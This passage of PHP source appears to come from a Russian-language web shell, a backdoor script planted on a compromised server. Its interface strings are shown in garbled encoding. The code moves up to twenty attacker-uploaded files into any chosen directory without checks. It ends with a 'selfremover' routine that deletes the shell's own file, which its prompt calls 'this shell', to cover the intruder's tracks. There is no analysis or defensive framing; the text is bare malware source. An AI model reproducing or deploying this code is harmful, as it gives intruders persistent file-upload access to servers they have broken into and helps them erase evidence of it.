$uploadfile9 = "$where/".@$_FILES['text9']['name'];
|
|
$uploadfile10 = "$where/".@$_FILES['text10']['name'];
|
|
$uploadfile11 = "$where/".@$_FILES['text11']['name'];
|
|
$uploadfile12 = "$where/".@$_FILES['text12']['name'];
|
|
$uploadfile13 = "$where/".@$_FILES['text13']['name'];
|
|
$uploadfile14 = "$where/".@$_FILES['text14']['name'];
|
|
$uploadfile15 = "$where/".@$_FILES['text15']['name'];
|
|
$uploadfile16 = "$where/".@$_FILES['text16']['name'];
|
|
$uploadfile17 = "$where/".@$_FILES['text17']['name'];
|
|
$uploadfile18 = "$where/".@$_FILES['text18']['name'];
|
|
$uploadfile19 = "$where/".@$_FILES['text19']['name'];
|
|
$uploadfile20 = "$where/".@$_FILES['text20']['name'];
|
|
if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile1</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile2</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile3</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile4</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile5</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile6</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile7</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile8</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile9</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile10</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile11</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile12</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile13</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile14</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile15</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile16</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile17</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile18</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile19</i><br>";}
|
|
if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
|
|
$where=str_replace("\\\\","\\",$where);
|
|
echo "<i>Çàãðóæåíî: $uploadfile20</i><br>";}
|
|
}
|
|
|
|
exit;
|
|
break;
|
|
case "selfremover":
|
|
print "<tr><td>";
|
|
print "<center><font color=red face=verdana size=3>Òû óâåðåí, ÷òî õî÷åøü óäàëèòü ýòîò øåëë ñ ñåðâåðà?<br><br>
|
|
<a href='$php_self?p=yes'>Äà, õî÷ó</a> | <a href='$php_self?'>Íåò, ïóñòü åùå ïîáóäåò</a><br><br><br>
|
|
Áóäåì óäàëÿòü <u>";
|
|
$path=__FILE__;
|
|
print $path;
|
|
print "</u>?</td></tr></center></table>";
|
|
die;
|
|
}
|
|
|
|
if($p=="yes"){
|
|
$path=__FILE__;
|
|
@unlink($path);
|
|
$path=str_replace("\\","/",$path);
|
|
if(file_exists($path)){$hmm="Ôàéë íåâîçìîæíî óäàëèòü!";
|
|
print "<tr><td><font color=red>Ôàéë $path íå óäàëåí!</td></tr>";
|
|
}else{$hmm="Óäàëåí";}
|
|
print "<script>alert('$path $hmm');</script>";
|
|
|
|
}
|
|
break;
|
|
|
|
|
|
?> |